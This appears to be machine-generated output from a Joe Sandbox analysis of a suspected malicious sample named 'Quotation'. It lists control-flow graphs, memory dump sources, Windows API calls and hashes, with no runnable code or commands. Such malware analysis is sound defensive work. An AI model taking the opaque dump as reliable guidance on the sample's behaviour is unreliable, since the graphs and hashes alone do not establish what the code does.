44262->44264 44263 3b675c8c 3 API calls 44263->44264 44264->44263 44265 3b676f4e 44264->44265 44265->44221 44267 3b675c97 44266->44267 44268 3b677054 44267->44268 44269 3b676faa 44267->44269 44270 3b67061c 2 API calls 44268->44270 44271 3b677002 CallWindowProcW 44269->44271 44272 3b676fb1 44269->44272 44270->44272 44271->44272 44272->44221 44275 3b7d1341 44273->44275 44281 3b7d23db 44273->44281 44288 3b7d24f1 44273->44288 44275->44244 44278 3b7d23db 3 API calls 44277->44278 44279 3b7d1341 44277->44279 44280 3b7d24f1 3 API calls 44277->44280 44278->44279 44279->44244 44280->44279 44283 3b7d23f4 44281->44283 44282 3b7d24b1 44282->44275 44283->44282 44286 3b675c8c 3 API calls 44283->44286 44293 3b675c62 44283->44293 44300 3b676f59 44283->44300 44284 3b7d250a 44284->44275 44286->44284 44289 3b7d250a 44288->44289 44290 3b675c62 3 API calls 44288->44290 44291 3b675c8c 3 API calls 44288->44291 44292 3b676f59 3 API calls 44288->44292 44289->44275 44290->44289 44291->44289 44292->44289 44294 3b675c75 44293->44294 44295 3b677054 44294->44295 44296 3b676faa 44294->44296 44297 3b67061c 2 API calls 44295->44297 44298 3b677002 CallWindowProcW 44296->44298 44299 3b676fb1 44296->44299 44297->44299 44298->44299 44299->44284 44301 3b677054 44300->44301 44302 3b676faa 44300->44302 44303 3b67061c 2 API calls 44301->44303 44304 3b677002 CallWindowProcW 44302->44304 44305 3b676fb1 44302->44305 44303->44305 44304->44305 44305->44284 44323 3b672378 44324 3b6723e0 CreateWindowExW 44323->44324 44326 3b67249c 44324->44326 44327 3b677b18 44328 3b677b23 44327->44328 44330 3b677b33 44328->44330 44331 3b677588 44328->44331 44332 3b677b68 OleInitialize 44331->44332 44333 3b677bcc 44332->44333 44333->44330 44334 3b6760d8 DuplicateHandle 44335 3b67616e 44334->44335
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2802401619.000000003AB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 3AB40000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_3ab40000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: ,D48$,D48$>48U$F48
                                                                                            • API String ID: 0-2931146892
                                                                                            • Opcode ID: f094c011b7eb34cd3d628f49f8bcec48dcbc87f604be0e7c9d762bd5be6f667b
                                                                                            • Instruction ID: a202714e6ab998eaa7cf095fc0cde099429ef855a2ae5c85f6ee02e1ddf575ff
                                                                                            • Opcode Fuzzy Hash: f094c011b7eb34cd3d628f49f8bcec48dcbc87f604be0e7c9d762bd5be6f667b
                                                                                            • Instruction Fuzzy Hash: 10925738A002148FEB58CB68C584B9DBBF2FF49315F5984A9D449AB351DB35EC81EF90
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2802401619.000000003AB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 3AB40000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_3ab40000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: ,D48$-<8
                                                                                            • API String ID: 0-2679012280
                                                                                            • Opcode ID: e6d68af695fc5d9a9999f237c64692129068cdeb58f7ee8fb4f19931ea621af8
                                                                                            • Instruction ID: a4a1ab1ab8bd1e9013bc3e4e8e3753093e696ecdcaf05de13d47a8d4de96105f
                                                                                            • Opcode Fuzzy Hash: e6d68af695fc5d9a9999f237c64692129068cdeb58f7ee8fb4f19931ea621af8
                                                                                            • Instruction Fuzzy Hash: FB62BF34B002149FEB14DBA8D5A0B9DBBF6EF89354F548469E405EB391DB39DC42EB80

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1268 3ab45648-3ab45665 1269 3ab45667-3ab4566a 1268->1269 1270 3ab45680-3ab45683 1269->1270 1271 3ab4566c-3ab4567b 1269->1271 1272 3ab45685-3ab45688 1270->1272 1273 3ab4568d-3ab45690 1270->1273 1271->1270 1272->1273 1274 3ab45692-3ab45698 1273->1274 1275 3ab4569f-3ab456a2 1273->1275 1277 3ab456b8-3ab456be 1274->1277 1278 3ab4569a 1274->1278 1279 3ab456a4-3ab456a8 1275->1279 1280 3ab456b3-3ab456b6 1275->1280 1284 3ab456c4-3ab456cc 1277->1284 1285 3ab4581b-3ab4584b 1277->1285 1278->1275 1281 3ab4580d-3ab4581a 1279->1281 1282 3ab456ae 1279->1282 1280->1277 1283 3ab456ee-3ab456f1 1280->1283 1282->1280 1283->1274 1287 3ab456f3-3ab456f6 1283->1287 1284->1285 1286 3ab456d2-3ab456df 1284->1286 1296 3ab45855-3ab45858 1285->1296 1286->1285 1289 3ab456e5-3ab456e9 1286->1289 1290 3ab45705-3ab45708 1287->1290 1291 3ab456f8-3ab456fe 1287->1291 1289->1283 1294 3ab4571c-3ab4571f 1290->1294 1295 3ab4570a-3ab45717 1290->1295 1292 3ab45700 1291->1292 1293 3ab4574a-3ab4574d 1291->1293 1292->1290 1301 3ab45752-3ab45755 1293->1301 1297 3ab45725-3ab45728 1294->1297 1298 3ab457ca-3ab457d0 1294->1298 1295->1294 1299 3ab4587a-3ab4587d 1296->1299 1300 3ab4585a-3ab4585e 1296->1300 1303 3ab45745-3ab45748 1297->1303 1304 3ab4572a-3ab45740 1297->1304 1307 3ab45757-3ab45761 1298->1307 1309 3ab457d2 1298->1309 1310 3ab45887-3ab4588a 1299->1310 1311 3ab4587f-3ab45886 1299->1311 1305 3ab45864-3ab4586c 1300->1305 1306 3ab4594a-3ab45984 1300->1306 1301->1307 1308 3ab4576f-3ab45772 1301->1308 1303->1293 1303->1301 1304->1303 1305->1306 1316 3ab45872-3ab45875 1305->1316 1336 3ab45986-3ab45989 1306->1336 1327 3ab45768-3ab4576a 1307->1327 1314 3ab45774-3ab4577b 1308->1314 1315 3ab45780-3ab45783 1308->1315 1317 3ab457d7-3ab457da 1309->1317 1312 3ab458ac-3ab458af 1310->1312 1313 3ab4588c-3ab45890 1310->1313 1323 3ab458d1-3ab458d4 1312->1323 1324 3ab458b1-3ab458b5 1312->1324 1313->1306 1320 3ab45896-3ab4589e 1313->1320 1314->1315 1321 3ab45785-3ab45797 1315->1321 1322 3ab4579c-3ab4579f 1315->1322 1316->1299 1318 3ab457e2-3ab457e5 1317->1318 1319 3ab457dc-3ab457dd 1317->1319 1328 3ab457e7-3ab457f0 1318->1328 1329 3ab457f1-3ab457f4 1318->1329 1319->1318 1320->1306 1330 3ab458a4-3ab458a7 1320->1330 1321->1322 1332 3ab457c5-3ab457c8 1322->1332 1333 3ab457a1-3ab457c0 1322->1333 1334 3ab458e4-3ab458e7 1323->1334 1335 3ab458d6-3ab458dd 1323->1335 1324->1306 1331 3ab458bb-3ab458c3 1324->1331 1327->1308 1337 3ab457f6-3ab457f8 1329->1337 1338 3ab457fb-3ab457fd 1329->1338 1330->1312 1331->1306 1340 3ab458c9-3ab458cc 1331->1340 1332->1298 1332->1317 1333->1332 1343 3ab458f8-3ab458fb 1334->1343 1344 3ab458e9-3ab458f3 1334->1344 1341 3ab45942-3ab45949 1335->1341 1342 3ab458df 1335->1342 1345 3ab45a6f-3ab45c03 1336->1345 1346 3ab4598f-3ab45992 1336->1346 1337->1338 1347 3ab45804-3ab45807 1338->1347 1348 3ab457ff 1338->1348 1340->1323 1342->1334 1350 3ab45913-3ab45916 1343->1350 1351 3ab458fd-3ab4590e 1343->1351 1344->1343 1417 3ab45d39-3ab45d4c 1345->1417 1418 3ab45c09-3ab45c10 1345->1418 1352 3ab45994-3ab459a7 1346->1352 1353 3ab459aa-3ab459ad 1346->1353 1347->1269 1347->1281 1348->1347 1355 3ab45930-3ab45932 1350->1355 1356 3ab45918-3ab4591c 1350->1356 1351->1350 1357 3ab459c7-3ab459ca 1353->1357 1358 3ab459af-3ab459c0 1353->1358 1363 3ab45934 1355->1363 1364 3ab45939-3ab4593c 1355->1364 1356->1306 1362 3ab4591e-3ab45926 1356->1362 1357->1345 1365 3ab459d0-3ab459d3 1357->1365 1372 3ab459c2 1358->1372 1373 3ab45a39-3ab45a40 1358->1373 1362->1306 1368 3ab45928-3ab4592b 1362->1368 1363->1364 1364->1296 1364->1341 1370 3ab459d5-3ab459da 1365->1370 1371 3ab459dd-3ab459e0 1365->1371 1368->1355 1370->1371 1374 3ab459e2-3ab459f3 1371->1374 1375 3ab459fa-3ab459fd 1371->1375 1372->1357 1379 3ab45a45-3ab45a48 1373->1379 1374->1373 1388 3ab459f5 1374->1388 1376 3ab45a17-3ab45a1a 1375->1376 1377 3ab459ff-3ab45a10 1375->1377 1380 3ab45a34-3ab45a37 1376->1380 1381 3ab45a1c-3ab45a2d 1376->1381 1377->1352 1389 3ab45a12 1377->1389 1382 3ab45a66-3ab45a69 1379->1382 1383 3ab45a4a-3ab45a5b 1379->1383 1380->1373 1380->1379 1381->1373 1394 3ab45a2f 1381->1394 1382->1345 1385 3ab45d4f-3ab45d52 1382->1385 1383->1358 1398 3ab45a61 1383->1398 1391 3ab45d54-3ab45d5b 1385->1391 1392 3ab45d60-3ab45d62 1385->1392 1388->1375 1389->1376 1391->1392 1396 3ab45d64 1392->1396 1397 3ab45d69-3ab45d6c 1392->1397 1394->1380 1396->1397 1397->1336 1399 3ab45d72-3ab45d7b 1397->1399 1398->1382 1419 3ab45cc4-3ab45ccb 1418->1419 1420 3ab45c16-3ab45c49 1418->1420 1419->1417 1422 3ab45ccd-3ab45d00 1419->1422 1431 3ab45c4e-3ab45c8f 1420->1431 1432 3ab45c4b 1420->1432 1433 3ab45d05-3ab45d32 1422->1433 1434 3ab45d02 1422->1434 1442 3ab45ca7-3ab45cae 1431->1442 1443 3ab45c91-3ab45ca2 1431->1443 1432->1431 1433->1399 1433->1417 1434->1433 1445 3ab45cb6-3ab45cb8 1442->1445 1443->1399 1445->1399
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2802401619.000000003AB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 3AB40000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_3ab40000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: *980*98D*98$$
                                                                                            • API String ID: 0-2248006349
                                                                                            • Opcode ID: fdee8d5819e665c8e9fd094311950251c07b0e7616cd1a8a4578ce219805e9c8
                                                                                            • Instruction ID: e56ac7658edf4e5e9e5035d6409fe218a43e22a9d6ea694346edb27c3f5504d7
                                                                                            • Opcode Fuzzy Hash: fdee8d5819e665c8e9fd094311950251c07b0e7616cd1a8a4578ce219805e9c8
                                                                                            • Instruction Fuzzy Hash: 1222E475E006248FEB14CBA8C58069EBBB6EF85320F24856AD455AB345DF35DC42EB90

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1446 3ab43108-3ab43129 1447 3ab4312b-3ab4312e 1446->1447 1448 3ab43134-3ab43153 1447->1448 1449 3ab438cf-3ab438d2 1447->1449 1458 3ab43155-3ab43158 1448->1458 1459 3ab4316c-3ab43176 1448->1459 1450 3ab438d4-3ab438f3 1449->1450 1451 3ab438f8-3ab438fa 1449->1451 1450->1451 1453 3ab43901-3ab43904 1451->1453 1454 3ab438fc 1451->1454 1453->1447 1456 3ab4390a-3ab43913 1453->1456 1454->1453 1458->1459 1461 3ab4315a-3ab4316a 1458->1461 1464 3ab4317c-3ab4318b 1459->1464 1461->1464 1572 3ab4318d call 3ab43921 1464->1572 1573 3ab4318d call 3ab43928 1464->1573 1465 3ab43192-3ab43197 1466 3ab431a4-3ab43481 1465->1466 1467 3ab43199-3ab4319f 1465->1467 1488 3ab43487-3ab43536 1466->1488 1489 3ab438c1-3ab438ce 1466->1489 1467->1456 1498 3ab4355f 1488->1498 1499 3ab43538-3ab4355d 1488->1499 1500 3ab43568-3ab4357b 1498->1500 1499->1500 1503 3ab43581-3ab435a3 1500->1503 1504 3ab438a8-3ab438b4 1500->1504 1503->1504 1507 3ab435a9-3ab435b3 1503->1507 1504->1488 1505 3ab438ba 1504->1505 1505->1489 1507->1504 1508 3ab435b9-3ab435c4 1507->1508 1508->1504 1509 3ab435ca-3ab436a0 1508->1509 1521 3ab436a2-3ab436a4 1509->1521 1522 3ab436ae-3ab436de 1509->1522 1521->1522 1526 3ab436e0-3ab436e2 1522->1526 1527 3ab436ec-3ab436f8 1522->1527 1526->1527 1528 3ab43758-3ab4375c 1527->1528 1529 3ab436fa-3ab436fe 1527->1529 1530 3ab43762-3ab4379e 1528->1530 1531 3ab43899-3ab438a2 1528->1531 1529->1528 1532 3ab43700-3ab4372a 1529->1532 1542 3ab437a0-3ab437a2 1530->1542 1543 3ab437ac-3ab437ba 1530->1543 1531->1504 1531->1509 1539 3ab4372c-3ab4372e 1532->1539 1540 3ab43738-3ab43755 1532->1540 1539->1540 1540->1528 1542->1543 1546 3ab437d1-3ab437dc 1543->1546 1547 3ab437bc-3ab437c7 1543->1547 1550 3ab437f4-3ab43805 1546->1550 1551 3ab437de-3ab437e4 1546->1551 1547->1546 1552 3ab437c9 1547->1552 1556 3ab43807-3ab4380d 1550->1556 1557 3ab4381d-3ab43829 1550->1557 1553 3ab437e6 1551->1553 1554 3ab437e8-3ab437ea 1551->1554 1552->1546 1553->1550 1554->1550 1558 3ab43811-3ab43813 1556->1558 1559 3ab4380f 1556->1559 1561 3ab43841-3ab43892 1557->1561 1562 3ab4382b-3ab43831 1557->1562 1558->1557 1559->1557 1561->1531 1563 3ab43835-3ab43837 1562->1563 1564 3ab43833 1562->1564 1563->1561 1564->1561 1572->1465 1573->1465
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2802401619.000000003AB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 3AB40000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_3ab40000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: ,F48$F48
                                                                                            • API String ID: 0-385877324
                                                                                            • Opcode ID: 37c1d5841f450f23f7119c87091da5dcabeb4d5b4b9cc3969696d76c671d32c5
                                                                                            • Instruction ID: 68afd926966e2dd44fde1fb0b7e686d7f388dfeef4a4b14e7457beb0ac86ae90
                                                                                            • Opcode Fuzzy Hash: 37c1d5841f450f23f7119c87091da5dcabeb4d5b4b9cc3969696d76c671d32c5
                                                                                            • Instruction Fuzzy Hash: 64325F34E10759CBDB14DBA9C89099DF7B6FFC9300F64C66AD419BB210EB30A985DB90
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2774568179.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_150000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7fd228b9d2d0ccb5c9e072b07b8769e49647a33194622617562ad5aa02a01c46
                                                                                            • Instruction ID: 8eb91c5e462833cb373ed4085094a398e27870fbf0d9cc6fe9218422fba67ec4
                                                                                            • Opcode Fuzzy Hash: 7fd228b9d2d0ccb5c9e072b07b8769e49647a33194622617562ad5aa02a01c46
                                                                                            • Instruction Fuzzy Hash: 6563F831D10B1ACACB11EF68C8945A9F7B1FF99300F55D79AE4587B121EB70AAC4CB81
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2802401619.000000003AB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 3AB40000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_3ab40000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: DR48
                                                                                            • API String ID: 0-3374490049
                                                                                            • Opcode ID: c89d0666d834a7a45d7df536df41abf9622a856d1829095feeed1293b8bdaea4
                                                                                            • Instruction ID: aeb814518e9817ee617980fa0ab9031b1ffcfe67adc46778fbfc0707ba4840f3
                                                                                            • Opcode Fuzzy Hash: c89d0666d834a7a45d7df536df41abf9622a856d1829095feeed1293b8bdaea4
                                                                                            • Instruction Fuzzy Hash: 02029D34B002159FEB18DBA8D894A9EB7F6FF89340F148529D415AB391DB35EC42EB90
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2774568179.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_150000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: \Vcm
                                                                                            • API String ID: 0-3044874373
                                                                                            • Opcode ID: 5075996c69a8bc8105687ee6932881b82262a269eb56aac85e40972ad4148eda
                                                                                            • Instruction ID: 4998dbd98f40e824e2a0cf037a6e95dedb0c5be686ed2c25dce82ea517e3c020
                                                                                            • Opcode Fuzzy Hash: 5075996c69a8bc8105687ee6932881b82262a269eb56aac85e40972ad4148eda
                                                                                            • Instruction Fuzzy Hash: 40917170E00609CFDF14CFA9C9857DEBBF1AF88315F148529E824EB294DB749989CB81
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2802401619.000000003AB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 3AB40000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_3ab40000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2c8f2c872b992f27b2800bc575be541337a9d4d89f662af0afcce4cd3edb747b
                                                                                            • Instruction ID: a31d333c0e20817ea0097090d70e3cc6c9a7c77d0354a35e5d32a4d6dce60430
                                                                                            • Opcode Fuzzy Hash: 2c8f2c872b992f27b2800bc575be541337a9d4d89f662af0afcce4cd3edb747b
                                                                                            • Instruction Fuzzy Hash: A532D274B002148FEB54CFA8D894B9EB7B6FB8A710F148529E415EB351CB34EC42EB91
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2774568179.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_150000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: bf48d43a925da2d7f0beeeece78eb7f75cfbe4e2da95b458fbda8ff2a5d7f59b
                                                                                            • Instruction ID: 597335d233c8a6c87deec1ac28d3b6753696ddf59643b2bab0ecd13bbaefbbff
                                                                                            • Opcode Fuzzy Hash: bf48d43a925da2d7f0beeeece78eb7f75cfbe4e2da95b458fbda8ff2a5d7f59b
                                                                                            • Instruction Fuzzy Hash: C1221471A04215CFDB25CB68D8807BEBBB2EF85311F1585AAD865DF282C735EC4AC790
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2802401619.000000003AB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 3AB40000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_3ab40000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 078f94acf5e61c91e2af2f5760d12d2d05b37907b428bbf6a0526a0bd7af27ab
                                                                                            • Instruction ID: 6f609a2cae822c81675a7a27780a272682a4db76b58aa1758ad92ed8f27da008
                                                                                            • Opcode Fuzzy Hash: 078f94acf5e61c91e2af2f5760d12d2d05b37907b428bbf6a0526a0bd7af27ab
                                                                                            • Instruction Fuzzy Hash: 68228078E002198BFF54CBACC49079DB7B6FB49350F24842AE549EB391DA35DC81BB91
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2774568179.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_150000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4c030ea7cab0235823a809be4693a34fd490d616a941523e529fc81803287e02
                                                                                            • Instruction ID: df157f8a7ddef9bf41bda99516b95d0f31b513c98debcc321379058633d85152
                                                                                            • Opcode Fuzzy Hash: 4c030ea7cab0235823a809be4693a34fd490d616a941523e529fc81803287e02
                                                                                            • Instruction Fuzzy Hash: CCD18D70A40205CFDB14CFA8D880B9EBBB6EF89311F548669D819DB391D771DC498B92
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2774568179.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_150000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b9d92e61f5f69512f2feccb62329ec8e82bd1f7d7e950c9d9feda8e5e3acca92
                                                                                            • Instruction ID: 22eaa49d95816d0cdb81b4926a19532ddf83e12e0c413bae912010f6af8e3bac
                                                                                            • Opcode Fuzzy Hash: b9d92e61f5f69512f2feccb62329ec8e82bd1f7d7e950c9d9feda8e5e3acca92
                                                                                            • Instruction Fuzzy Hash: E2B15470E00309CFDB14CFA9D89579DBBF2AF88359F148529D825EB354EB749889CB81

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 0 158729-15873f 1 158741-158744 0->1 2 158746-15876c 1->2 3 158771-158774 1->3 2->3 4 158776-15879c 3->4 5 1587a1-1587a4 3->5 4->5 6 1587a6-1587cc 5->6 7 1587d1-1587d4 5->7 6->7 9 1587d6-1587fc 7->9 10 158801-158804 7->10 9->10 12 158806-15882c 10->12 13 158831-158834 10->13 12->13 16 158836-15885c 13->16 17 158861-158864 13->17 16->17 20 158866-15888c 17->20 21 158891-158894 17->21 20->21 25 1588a5-1588a8 21->25 26 158896-158898 21->26 30 1588b5-1588b8 25->30 31 1588aa 25->31 214 15889a call 159f70 26->214 215 15889a call 159f80 26->215 216 15889a call 15a023 26->216 38 1588e5-1588e8 30->38 39 1588ba-1588e0 30->39 42 1588b0 31->42 35 1588a0 35->25 40 158915-158918 38->40 41 1588ea-158910 38->41 39->38 46 158945-158948 40->46 47 15891a-158940 40->47 41->40 42->30 49 158975-158978 46->49 50 15894a-158970 46->50 47->46 53 1589a5-1589a8 49->53 54 15897a-1589a0 49->54 50->49 57 1589d5-1589d8 53->57 58 1589aa-1589d0 53->58 54->53 61 158a05-158a08 57->61 62 1589da-158a00 57->62 58->57 66 158a35-158a38 61->66 67 158a0a-158a30 61->67 62->61 71 158a65-158a68 66->71 72 158a3a-158a60 66->72 67->66 76 158a95-158a98 71->76 77 158a6a-158a90 71->77 72->71 81 158ac5-158ac8 76->81 82 158a9a-158ac0 76->82 77->76 86 158af5-158af8 81->86 87 158aca-158af0 81->87 82->81 91 158b25-158b28 86->91 92 158afa-158b20 86->92 87->86 96 158b55-158b58 91->96 97 158b2a-158b50 91->97 92->91 101 158b85-158b88 96->101 102 158b5a-158b80 96->102 97->96 106 158bb5-158bb8 101->106 107 158b8a-158bb0 101->107 102->101 111 158be5-158be8 106->111 112 158bba-158be0 106->112 107->106 116 158c15-158c18 111->116 117 158bea-158c10 111->117 112->111 121 158c45-158c48 116->121 122 158c1a-158c40 116->122 117->116 126 158c65-158c68 121->126 127 158c4a-158c60 121->127 122->121 131 158c95-158c98 126->131 132 158c6a-158c90 126->132 127->126 139 158cc5-158cc8 131->139 140 158c9a-158cc0 131->140 132->131 141 158cf5-158cf8 139->141 142 158cca-158cf0 139->142 140->139 149 158d25-158d28 141->149 150 158cfa-158d20 141->150 142->141 151 158d55-158d58 149->151 152 158d2a-158d50 149->152 150->149 158 158d85-158d88 151->158 159 158d5a-158d80 151->159 152->151 160 158db5-158db8 158->160 161 158d8a-158db0 158->161 159->158 168 158de5-158de8 160->168 169 158dba-158de0 160->169 161->160 170 158e15-158e18 168->170 171 158dea-158e10 168->171 169->168 178 158e45-158e48 170->178 179 158e1a-158e40 170->179 171->170 180 158e75-158e78 178->180 181 158e4a-158e70 178->181 179->178 188 158ea5-158ea8 180->188 189 158e7a-158ea0 180->189 181->180 190 158ec3-158ec6 188->190 191 158eaa-158eb6 188->191 189->188 198 158ef3-158ef5 190->198 199 158ec8-158eee 190->199 209 158ebe 191->209 200 158ef7 198->200 201 158efc-158eff 198->201 199->198 200->201 201->1 207 158f05-158f0b 201->207 209->190 214->35 215->35 216->35
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2774568179.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_150000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 848$@ 48$`48$`"48$p$48
                                                                                            • API String ID: 0-3022964796
                                                                                            • Opcode ID: c1328203f92fcf791f2a6144bb31cbbc92ffe6b4d81530b9a81cc7c8616b1c8f
                                                                                            • Instruction ID: c33bfc0202d5957b774c144488a4b170a23d8805f85add057a3ee67c7ddff7eb
                                                                                            • Opcode Fuzzy Hash: c1328203f92fcf791f2a6144bb31cbbc92ffe6b4d81530b9a81cc7c8616b1c8f
                                                                                            • Instruction Fuzzy Hash: 4112A3B4700201CBEB55AB78D4A126D73EAFBCA341B20892AE415EF351CF79DD478B91

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 217 3b675e81-3b675f1f GetCurrentProcess 221 3b675f21-3b675f27 217->221 222 3b675f28-3b675f5c GetCurrentThread 217->222 221->222 223 3b675f65-3b675f99 GetCurrentProcess 222->223 224 3b675f5e-3b675f64 222->224 225 3b675fa2-3b675fbd call 3b676060 223->225 226 3b675f9b-3b675fa1 223->226 224->223 230 3b675fc3-3b675ff2 GetCurrentThreadId 225->230 226->225 231 3b675ff4-3b675ffa 230->231 232 3b675ffb-3b67605d 230->232 231->232
                                                                                            APIs
                                                                                            • GetCurrentProcess.KERNEL32 ref: 3B675F0E
                                                                                            • GetCurrentThread.KERNEL32 ref: 3B675F4B
                                                                                            • GetCurrentProcess.KERNEL32 ref: 3B675F88
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 3B675FE1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2802690335.000000003B670000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B670000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_3b670000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID: Current$ProcessThread
                                                                                            • String ID:
                                                                                            • API String ID: 2063062207-0
                                                                                            • Opcode ID: 88d0d59c3f09e0d37a76c76a5ac4ac53a8111786c64687f4f92331a9f5de7035
                                                                                            • Instruction ID: bc15561bf06c99555bfecc29b4d10534a1a56e4652cd6b3312d609df0cacde71
                                                                                            • Opcode Fuzzy Hash: 88d0d59c3f09e0d37a76c76a5ac4ac53a8111786c64687f4f92331a9f5de7035
                                                                                            • Instruction Fuzzy Hash: C85145B09007499FDB14DFAAD549BAEBBF1EF48310F248059E409A7391D7749940CFA6

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 239 3b675e90-3b675f1f GetCurrentProcess 243 3b675f21-3b675f27 239->243 244 3b675f28-3b675f5c GetCurrentThread 239->244 243->244 245 3b675f65-3b675f99 GetCurrentProcess 244->245 246 3b675f5e-3b675f64 244->246 247 3b675fa2-3b675fbd call 3b676060 245->247 248 3b675f9b-3b675fa1 245->248 246->245 252 3b675fc3-3b675ff2 GetCurrentThreadId 247->252 248->247 253 3b675ff4-3b675ffa 252->253 254 3b675ffb-3b67605d 252->254 253->254
                                                                                            APIs
                                                                                            • GetCurrentProcess.KERNEL32 ref: 3B675F0E
                                                                                            • GetCurrentThread.KERNEL32 ref: 3B675F4B
                                                                                            • GetCurrentProcess.KERNEL32 ref: 3B675F88
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 3B675FE1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2802690335.000000003B670000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B670000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_3b670000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID: Current$ProcessThread
                                                                                            • String ID:
                                                                                            • API String ID: 2063062207-0
                                                                                            • Opcode ID: 2e023471c3a9db69552cda63da2d0069348453ce44677bdd9e676a7f7b8fb16f
                                                                                            • Instruction ID: dbe9bfc15b46decf2e709f7bdad15b0726da3e05f67b76ace3e55c9a7a4a5e95
                                                                                            • Opcode Fuzzy Hash: 2e023471c3a9db69552cda63da2d0069348453ce44677bdd9e676a7f7b8fb16f
                                                                                            • Instruction Fuzzy Hash: FA5146B09007498FDB04DFAAD545BAEBBF1EF48310F248059E419A7351D7749940CFA6

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
